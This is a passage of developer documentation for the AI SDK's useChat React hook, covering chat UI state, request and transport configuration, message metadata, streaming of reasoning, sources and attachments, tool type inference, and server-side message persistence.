{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
{(status === 'submitted' || status === 'streaming') && (
<div>
{status === 'submitted' && <Spinner />}
<button type="button" onClick={() => stop()}>
Stop
</button>
</div>
)}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
placeholder="Say something..."
/>
<button type="submit" disabled={status !== 'ready'}>
Submit
</button>
</form>
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, disable the submit button, or show a retry button:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, error, regenerate } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => reload()}>
Retry
</button>
</>
)}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={error != null}
/>
</form>
</div>
);
}
Please also see the error handling guide for more information.
Modify messages
Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.
The setMessages function can help you achieve these tasks:
const { messages, setMessages } = useChat()
const handleDelete = (id) => {
setMessages(messages.filter(message => message.id !== id))
}
return <>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => (
part.type === 'text' ? (
<span key={index}>{part.text}</span>
) : null
))}
<button onClick={() => handleDelete(message.id)}>Delete</button>
</div>
))}
...
You can think of messages and setMessages as a pair of state and setState in React.
Cancellation and regeneration
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.
const { stop, status } = useChat()
return <>
<button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
...
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.
Similarly, you can also request the AI provider to reprocess the last message by calling the regenerate function returned by the useChat hook:
const { regenerate, status } = useChat();
return (
<>
<button
onClick={regenerate}
disabled={!(status === 'ready' || status === 'error')}
>
Regenerate
</button>
...
</>
);
When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.
Throttling UI Updates
This feature is currently only available for React.
By default, the useChat hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { messages, ... } = useChat({
// Throttle the messages and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:
- `onFinish`: Called when the assistant response is completed. The event includes the response message, all messages, and flags for abort, disconnect, and errors.
- `onError`: Called when an error occurs during the fetch request.
- `onData`: Called whenever a data part is received.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
import { UIMessage } from 'ai';
const {
/* ... */
} = useChat({
onFinish: ({ message, messages, isAbort, isDisconnect, isError }) => {
// use information to e.g. update other UI states
},
onError: error => {
console.error('An error occurred:', error);
},
onData: data => {
console.log('Received data part from server:', data);
},
});
It's worth noting that you can abort the processing by throwing an error in the onData callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.
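For example (a sketch; the `data-moderation` part name is hypothetical and would be a custom data part sent by your server):
const { messages, sendMessage } = useChat({
  onData: data => {
    if (data.type === 'data-moderation') {
      // throwing here stops processing and triggers onError
      throw new Error('Response was flagged by moderation');
    }
  },
});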
Request Configuration
Custom headers, body, and credentials
By default, the useChat hook sends an HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request in two ways:
Hook-Level Configuration (Applied to all requests)
You can configure transport-level options that will be applied to all requests made by the hook:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
}),
});
Dynamic Hook-Level Configuration
You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: () => ({
Authorization: `Bearer ${getAuthToken()}`,
'X-User-ID': getCurrentUserId(),
}),
body: () => ({
sessionId: getCurrentSessionId(),
preferences: getUserPreferences(),
}),
credentials: () => 'include',
}),
});
Request-Level Configuration (Recommended)
// Pass options as the second parameter to sendMessage
sendMessage(
{ text: input },
{
headers: {
Authorization: 'Bearer token123',
'X-Custom-Header': 'custom-value',
},
body: {
temperature: 0.7,
max_tokens: 100,
user_id: '123',
},
metadata: {
userId: 'user123',
sessionId: 'session456',
},
},
);
The request-level options are merged with hook-level options, with request-level options taking precedence. On your server side, you can handle the request with this additional information.
Setting custom body fields per request
You can configure custom body fields on a per-request basis using the second parameter of the sendMessage function.
This is useful if you want to pass in additional information to your backend that is not part of the message list.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage } = useChat();
const [input, setInput] = useState('');
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage(
{ text: input },
{
body: {
customKey: 'customValue',
},
},
);
setInput('');
}
}}
>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</div>
);
}
You can retrieve these custom fields on your server side by destructuring the request body:
export async function POST(req: Request) {
// Extract additional information ("customKey") from the body of the request:
const { messages, customKey }: { messages: UIMessage[]; customKey: string } =
await req.json();
//...
}
Message Metadata
You can attach custom metadata to messages for tracking information like timestamps, model details, and token usage.
// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
messageMetadata: ({ part }) => {
if (part.type === 'start') {
return {
createdAt: Date.now(),
model: 'gpt-5.1',
};
}
if (part.type === 'finish') {
return {
totalTokens: part.totalUsage.totalTokens,
};
}
},
});
// Client: Access metadata via message.metadata
{
messages.map(message => (
<div key={message.id}>
{message.role}:{' '}
{message.metadata?.createdAt &&
new Date(message.metadata.createdAt).toLocaleTimeString()}
{/* Render message content */}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
{/* Show token count if available */}
{message.metadata?.totalTokens && (
<span>{message.metadata.totalTokens} tokens</span>
)}
</div>
));
}
For complete examples with type safety and advanced use cases, see the Message Metadata documentation.
Transport Configuration
You can configure custom transport behavior using the transport option to customize how messages are sent to your API:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
const { messages, sendMessage } = useChat({
id: 'my-chat',
transport: new DefaultChatTransport({
prepareSendMessagesRequest: ({ id, messages }) => {
return {
body: {
id,
message: messages[messages.length - 1],
},
};
},
}),
});
// ... rest of your component
}
The corresponding API route receives the custom request format:
export async function POST(req: Request) {
const { id, message } = await req.json();
// Load existing messages and add the new one
const messages = await loadMessages(id);
messages.push(message);
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Advanced: Trigger-based routing
For more complex scenarios like message regeneration, you can use trigger-based routing:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
const { messages, sendMessage, regenerate } = useChat({
id: 'my-chat',
transport: new DefaultChatTransport({
prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
if (trigger === 'submit-user-message') {
return {
body: {
trigger: 'submit-user-message',
id,
message: messages[messages.length - 1],
messageId,
},
};
} else if (trigger === 'regenerate-assistant-message') {
return {
body: {
trigger: 'regenerate-assistant-message',
id,
messageId,
},
};
}
throw new Error(`Unsupported trigger: ${trigger}`);
},
}),
});
// ... rest of your component
}
The corresponding API route would handle different triggers:
export async function POST(req: Request) {
const { trigger, id, message, messageId } = await req.json();
const chat = await readChat(id);
let messages = chat.messages;
if (trigger === 'submit-user-message') {
// Handle new user message
messages = [...messages, message];
} else if (trigger === 'regenerate-assistant-message') {
// Handle message regeneration - remove messages after messageId
const messageIndex = messages.findIndex(m => m.id === messageId);
if (messageIndex !== -1) {
messages = messages.slice(0, messageIndex);
}
}
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
To learn more about building custom transports, refer to the Transport API documentation.
Controlling the response stream
With streamText, you can control how error messages and usage information are sent back to the client.
Error Messages
By default, the error message is masked for security reasons.
The default error message is "An error occurred."
You can forward error messages or send your own error message by providing an onError function:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
onError: error => {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
},
});
}
Usage Information
Track token consumption and resource usage with message metadata:
- Define a custom metadata type with usage fields (optional, for type safety)
- Attach usage data using `messageMetadata` in your response
- Display usage metrics in your UI components
Usage data is attached as metadata to messages and becomes available once the model completes its response generation.
import {
convertToModelMessages,
streamText,
UIMessage,
type LanguageModelUsage,
} from 'ai';
__PROVIDER_IMPORT__;
// Create a new metadata type (optional for type-safety)
type MyMetadata = {
totalUsage: LanguageModelUsage;
};
// Create a new custom message type with your own metadata
export type MyUIMessage = UIMessage<MyMetadata>;
export async function POST(req: Request) {
const { messages }: { messages: MyUIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
messageMetadata: ({ part }) => {
// Send total usage when generation is finished
if (part.type === 'finish') {
return { totalUsage: part.totalUsage };
}
},
});
}
Then, on the client, you can access the message-level metadata.
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
// Use custom message type defined on the server (optional for type-safety)
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map(part => {
if (part.type === 'text') {
return part.text;
}
})}
{/* Render usage via metadata */}
{m.metadata?.totalUsage && (
<div>Total usage: {m.metadata?.totalUsage.totalTokens} tokens</div>
)}
</div>
))}
</div>
);
}
You can also access your metadata from the onFinish callback of useChat:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
// Use custom message type defined on the server (optional for type-safety)
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
onFinish: ({ message }) => {
// Access message metadata via onFinish callback
console.log(message.metadata?.totalUsage);
},
});
}
Text Streams
useChat can handle plain text streams by using the TextStreamChatTransport:
'use client';
import { useChat } from '@ai-sdk/react';
import { TextStreamChatTransport } from 'ai';
export default function Chat() {
const { messages } = useChat({
transport: new TextStreamChatTransport({
api: '/api/chat',
}),
});
return <>...</>;
}
This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.
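On the server, you can produce such a plain text stream with streamText by returning toTextStreamResponse instead of toUIMessageStreamResponse. A minimal sketch:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
});
// stream plain text chunks instead of the UI message stream protocol:
return result.toTextStreamResponse();
}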
Reasoning
Some models such as DeepSeek deepseek-r1
and Anthropic claude-3-7-sonnet-20250219 support reasoning tokens.
These tokens are typically sent before the message content.
You can forward them to the client with the sendReasoning option:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'deepseek/deepseek-r1',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
On the client side, you can access the reasoning parts of the message object.
Reasoning parts have a text property that contains the reasoning content.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
})}
</div>
));
Sources
Some providers such as Perplexity and Google Generative AI include sources in the response.
Currently sources are limited to web pages that ground the response.
You can forward them to the client with the sendSources option:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'perplexity/sonar-pro',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendSources: true,
});
}
On the client side, you can access source parts of the message object.
There are two types of sources: source-url for web pages and source-document for documents.
Here is an example that renders both types of sources:
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{/* Render URL sources */}
{message.parts
.filter(part => part.type === 'source-url')
.map(part => (
<span key={`source-${part.id}`}>
[
<a href={part.url} target="_blank">
{part.title ?? new URL(part.url).hostname}
</a>
]
</span>
))}
{/* Render document sources */}
{message.parts
.filter(part => part.type === 'source-document')
.map(part => (
<span key={`source-${part.id}`}>
[<span>{part.title ?? `Document ${part.id}`}</span>]
</span>
))}
</div>
));
Image Generation
Some models such as Google gemini-2.5-flash-image-preview support image generation.
When images are generated, they are exposed as files to the client.
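Server-side, no extra option is needed: generated images are included in the UI message stream as file parts. A minimal sketch of such a route (assuming the Google model ID above):
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
// assumes a model with image output support:
model: 'google/gemini-2.5-flash-image-preview',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}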
On the client side, you can access file parts of the message object
and render them as images.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
} else if (part.type === 'file' && part.mediaType.startsWith('image/')) {
return <img key={index} src={part.url} alt="Generated image" />;
}
})}
</div>
));
Attachments
The useChat hook supports sending file attachments along with a message as well as rendering them on the client. This can be useful for building applications that involve sending images, files, or other media content to the AI provider.
There are two ways to send files with a message: using a FileList object from file inputs or using an array of file objects.
FileList
By using FileList, you can send multiple files as attachments along with a message using the file input element. The useChat hook will automatically convert them into data URLs and send them to the AI provider.
'use client';
import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
export default function Page() {
const { messages, sendMessage, status } = useChat();
const [input, setInput] = useState('');
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (
part.type === 'file' &&
part.mediaType?.startsWith('image/')
) {
return <img key={index} src={part.url} alt={part.filename} />;
}
return null;
})}
</div>
</div>
))}
</div>
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage({
text: input,
files,
});
setInput('');
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}
}}
>
<input
type="file"
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
value={input}
placeholder="Send message..."
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
File Objects
You can also send files as objects along with a message. This can be useful for sending pre-uploaded files or data URLs.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { FileUIPart } from 'ai';
export default function Page() {
const { messages, sendMessage, status } = useChat();
const [input, setInput] = useState('');
const [files] = useState<FileUIPart[]>([
{
type: 'file',
filename: 'earth.png',
mediaType: 'image/png',
url: 'https://example.com/earth.png',
},
{
type: 'file',
filename: 'moon.png',
mediaType: 'image/png',
url: 'data:image/png;base64,iVBORw0KGgo...',
},
]);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (
part.type === 'file' &&
part.mediaType?.startsWith('image/')
) {
return <img key={index} src={part.url} alt={part.filename} />;
}
return null;
})}
</div>
</div>
))}
</div>
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage({
text: input,
files,
});
setInput('');
}
}}
>
<input
value={input}
placeholder="Send message..."
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
Type Inference for Tools
When working with tools in TypeScript, AI SDK UI provides type inference helpers to ensure type safety for your tool inputs and outputs.
InferUITool
The InferUITool type helper infers the input and output types of a single tool for use in UI messages:
import { InferUITool } from 'ai';
import { z } from 'zod';
const weatherTool = {
description: 'Get the current weather',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => {
return `The weather in ${location} is sunny.`;
},
};
// Infer the types from the tool
type WeatherUITool = InferUITool<typeof weatherTool>;
// This creates a type with:
// {
// input: { location: string };
// output: string;
// }
InferUITools
The InferUITools type helper infers the input and output types of a ToolSet:
import { InferUITools, ToolSet } from 'ai';
import { z } from 'zod';
const tools = {
weather: {
description: 'Get the current weather',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => {
return `The weather in ${location} is sunny.`;
},
},
calculator: {
description: 'Perform basic arithmetic',
inputSchema: z.object({
operation: z.enum(['add', 'subtract', 'multiply', 'divide']),
a: z.number(),
b: z.number(),
}),
execute: async ({ operation, a, b }) => {
switch (operation) {
case 'add':
return a + b;
case 'subtract':
return a - b;
case 'multiply':
return a * b;
case 'divide':
return a / b;
}
},
},
} satisfies ToolSet;
// Infer the types from the tool set
type MyUITools = InferUITools<typeof tools>;
// This creates a type with:
// {
// weather: { input: { location: string }; output: string };
// calculator: { input: { operation: 'add' | 'subtract' | 'multiply' | 'divide'; a: number; b: number }; output: number };
// }
Using Inferred Types
You can use these inferred types to create a custom UIMessage type and pass it to various AI SDK UI functions:
import { InferUITools, UIMessage, UIDataTypes } from 'ai';
type MyUITools = InferUITools<typeof tools>;
type MyUIMessage = UIMessage<never, UIDataTypes, MyUITools>;
Pass the custom type to useChat or createUIMessageStream:
import { useChat } from '@ai-sdk/react';
import { createUIMessageStream } from 'ai';
import type { MyUIMessage } from './types';
// With useChat
const { messages } = useChat<MyUIMessage>();
// With createUIMessageStream
const stream = createUIMessageStream<MyUIMessage>(/* ... */);
This provides full type safety for tool inputs and outputs on the client and server.
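For example, with the custom message type applied, tool parts narrow to their inferred shapes (a sketch using the weather tool defined above, where part.input narrows to { location: string } and part.output to string):
const { messages } = useChat<MyUIMessage>();
messages.forEach(message => {
message.parts.forEach(part => {
if (part.type === 'tool-weather' && part.state === 'output-available') {
// input and output are fully typed here:
console.log(part.input.location, part.output);
}
});
});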
title: Chatbot Message Persistence description: Learn how to store and load chat messages in a chatbot.
Chatbot Message Persistence
Being able to store and load chat messages is crucial for most AI chatbots.
In this guide, we'll show how to implement message persistence with useChat and streamText.
Starting a new chat
When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.
import { redirect } from 'next/navigation';
import { createChat } from '@util/chat-store';
export default async function Page() {
const id = await createChat(); // create a new chat
redirect(`/chat/${id}`); // redirect to chat page, see below
}
Our example chat store implementation uses files to store the chat messages. In a real-world application, you would use a database or a cloud storage service, and get the chat ID from the database. That being said, the function interfaces are designed to be easily replaced with other implementations.
import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';
export async function createChat(): Promise<string> {
const id = generateId(); // generate a unique chat ID
await writeFile(getChatFile(id), '[]'); // create an empty chat file
return id;
}
function getChatFile(id: string): string {
const chatDir = path.join(process.cwd(), '.chats');
if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
return path.join(chatDir, `${id}.json`);
}
Loading an existing chat
When the user navigates to the chat page with a chat ID, we need to load the chat messages from storage.
The loadChat function in our file-based chat store is implemented as follows:
import { UIMessage } from 'ai';
import { readFile } from 'fs/promises';
export async function loadChat(id: string): Promise<UIMessage[]> {
return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}
// ... rest of the file
Validating messages on the server
When processing messages on the server that contain tool calls, custom metadata, or data parts, you should validate them using validateUIMessages before sending them to the model.
Validation with tools
When your messages include tool calls, validate them against your tool definitions:
import {
convertToModelMessages,
streamText,
UIMessage,
validateUIMessages,
tool,
} from 'ai';
import { z } from 'zod';
import { loadChat, saveChat } from '@util/chat-store';
import { dataSchemas, metadataSchema } from '@util/schemas';
// Define your tools
const tools = {
weather: tool({
description: 'Get weather information',
inputSchema: z.object({
location: z.string(),
units: z.enum(['celsius', 'fahrenheit']),
}),
execute: async ({ location, units }) => {
/* tool implementation */
},
}),
// other tools
};
export async function POST(req: Request) {
const { message, id } = await req.json();
// Load previous messages from database
const previousMessages = await loadChat(id);
// Append the new message to the previous messages
const messages = [...previousMessages, message];
// Validate loaded messages against
// tools, data parts schema, and metadata schema
const validatedMessages = await validateUIMessages({
messages,
tools, // Ensures tool calls in messages match current schemas
dataSchemas,
metadataSchema,
});
const result = streamText({
model: 'openai/gpt-5-mini',
messages: convertToModelMessages(validatedMessages),
tools,
});
return result.toUIMessageStreamResponse({
originalMessages: validatedMessages,
onFinish: ({ messages }) => {
saveChat({ chatId: id, messages });
},
});
}
Handling validation errors
Handle validation errors gracefully when messages from the database don't match current schemas:
import {
convertToModelMessages,
streamText,
validateUIMessages,
TypeValidationError,
} from 'ai';
import { type MyUIMessage } from '@/types';
export async function POST(req: Request) {
const { message, id } = await req.json();
// Load and validate messages from database
let validatedMessages: MyUIMessage[];
try {
const previousMessages = await loadMessagesFromDB(id);
validatedMessages = await validateUIMessages({
// append the new message to the previous messages:
messages: [...previousMessages, message],
tools,
metadataSchema,
});
} catch (error) {
if (error instanceof TypeValidationError) {
// Log validation error for monitoring
console.error('Database messages validation failed:', error);
// Could implement message migration or filtering here
// For now, start with empty history
validatedMessages = [];
} else {
throw error;
}
}
// Continue with validated messages...
}
Displaying the chat
Once messages are loaded from storage, you can display them in your chat UI. Here's how to set up the page component and the chat display:
import { loadChat } from '@util/chat-store';
import Chat from '@ui/chat';
export default async function Page(props: { params: Promise<{ id: string }> }) {
const { id } = await props.params;
const messages = await loadChat(id);
return <Chat id={id} initialMessages={messages} />;
}
The chat component uses the useChat hook to manage the conversation:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, type UIMessage } from 'ai';
import { useState } from 'react';
export default function Chat({
id,
initialMessages,
}: { id?: string | undefined; initialMessages?: UIMessage[] } = {}) {
const [input, setInput] = useState('');
const { sendMessage, messages } = useChat({
id, // use the provided chat ID
messages: initialMessages, // load initial messages
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
// simplified rendering code, extend as needed:
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts
.map(part => (part.type === 'text' ? part.text : ''))
.join('')}
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
Storing messages
useChat sends the chat id and the messages to the backend.
When loading messages from storage that contain tools, metadata, or custom data
parts, validate them using validateUIMessages before processing (see the
validation section above).
Storing messages is done in the onFinish callback of the toUIMessageStreamResponse function.
onFinish receives the complete messages including the new AI response as UIMessage[].
import { saveChat } from '@util/chat-store';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
await req.json();
const result = streamText({
model: 'openai/gpt-5-mini',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
The actual storage of the messages is done in the saveChat function, which in
our file-based chat store is implemented as follows:
import { UIMessage } from 'ai';
import { writeFile } from 'fs/promises';
export async function saveChat({
chatId,
messages,
}: {
chatId: string;
messages: UIMessage[];
}): Promise<void> {
const content = JSON.stringify(messages, null, 2);
await writeFile(getChatFile(chatId), content);
}
// ... rest of the file
Message IDs
In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.
Client-side vs Server-side ID Generation
By default, message IDs are generated client-side:
- User message IDs are generated by the useChat hook on the client
- AI response message IDs are generated by streamText on the server
For applications without persistence, client-side ID generation works perfectly. However, for persistence, you need server-side generated IDs to ensure consistency across sessions and prevent ID conflicts when messages are stored and retrieved.
Setting Up Server-side ID Generation
When implementing persistence, you have two options for generating server-side IDs:
- Using generateMessageId in toUIMessageStreamResponse
- Setting IDs in your start message part with createUIMessageStream
Option 1: Using generateMessageId in toUIMessageStreamResponse
You can control the ID format by providing ID generators using createIdGenerator():
import { createIdGenerator, streamText } from 'ai';
export async function POST(req: Request) {
// ...
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
// Generate consistent server-side IDs for persistence:
generateMessageId: createIdGenerator({
prefix: 'msg',
size: 16,
}),
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
Option 2: Setting IDs with createUIMessageStream
Alternatively, you can use createUIMessageStream to control the message ID by writing a start message part:
import {
convertToModelMessages,
generateId,
streamText,
createUIMessageStream,
createUIMessageStreamResponse,
} from 'ai';
export async function POST(req: Request) {
const { messages, chatId } = await req.json();
const stream = createUIMessageStream({
execute: ({ writer }) => {
// Write start message part with custom ID
writer.write({
type: 'start',
messageId: generateId(), // Generate server-side ID for persistence
});
const result = streamText({
model: 'openai/gpt-5-mini',
messages: convertToModelMessages(messages),
});
writer.merge(result.toUIMessageStream({ sendStart: false })); // omit start message part
},
originalMessages: messages,
onFinish: ({ responseMessage }) => {
// save your chat here
},
});
return createUIMessageStreamResponse({ stream });
}
On the client, you can likewise customize the user message ID format by providing a generateId function to useChat:
import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';
const { ... } = useChat({
generateId: createIdGenerator({
prefix: 'msgc',
size: 16,
}),
// ...
});
Sending only the last message
Once you have implemented message persistence, you might want to send only the last message to the server. This reduces the amount of data sent to the server on each request and can improve performance.
To achieve this, you can provide a prepareSendMessagesRequest function to the transport.
This function receives the messages and the chat ID, and returns the request body to be sent to the server.
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const {
// ...
} = useChat({
// ...
transport: new DefaultChatTransport({
api: '/api/chat',
// only send the last message to the server:
prepareSendMessagesRequest({ messages, id }) {
return { body: { message: messages[messages.length - 1], id } };
},
}),
});
On the server, you can then load the previous messages and append the new message to the previous messages. If your messages contain tools, metadata, or custom data parts, you should validate them:
import { convertToModelMessages, streamText, UIMessage, validateUIMessages } from 'ai';
// import your tools and schemas
export async function POST(req: Request) {
// get the last message from the client:
const { message, id } = await req.json();
// load the previous messages from the server:
const previousMessages = await loadChat(id);
// validate messages if they contain tools, metadata, or data parts:
const validatedMessages = await validateUIMessages({
// append the new message to the previous messages:
messages: [...previousMessages, message],
tools, // if using tools
metadataSchema, // if using custom metadata
dataSchemas, // if using custom data parts
});
const result = streamText({
// ...
messages: convertToModelMessages(validatedMessages),
});
return result.toUIMessageStreamResponse({
originalMessages: validatedMessages,
onFinish: ({ messages }) => {
saveChat({ chatId: id, messages });
},
});
}
Handling client disconnects
By default, the AI SDK streamText function uses backpressure to the language model provider to prevent
the consumption of tokens that are not yet requested.
However, this means that when the client disconnects, e.g. by closing the browser tab or because of a network issue, the stream from the LLM will be aborted and the conversation may end up in a broken state.
Assuming that you have a storage solution in place, you can use the consumeStream method to consume the stream on the backend,
and then save the result as usual.
consumeStream effectively removes the backpressure,
meaning that the result is stored even when the client has already disconnected.
import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { saveChat } from '@util/chat-store';
export async function POST(req: Request) {
const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
await req.json();
const result = streamText({
model: 'openai/gpt-5-mini',
messages: convertToModelMessages(messages),
});
// consume the stream to ensure it runs to completion & triggers onFinish
// even when the client response is aborted:
result.consumeStream(); // no await
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
When the client reloads the page after a disconnect, the chat will be restored from the storage solution.
For more robust handling of disconnects, you may want to add resumability on disconnects. Check out the Chatbot Resume Streams documentation to learn more.
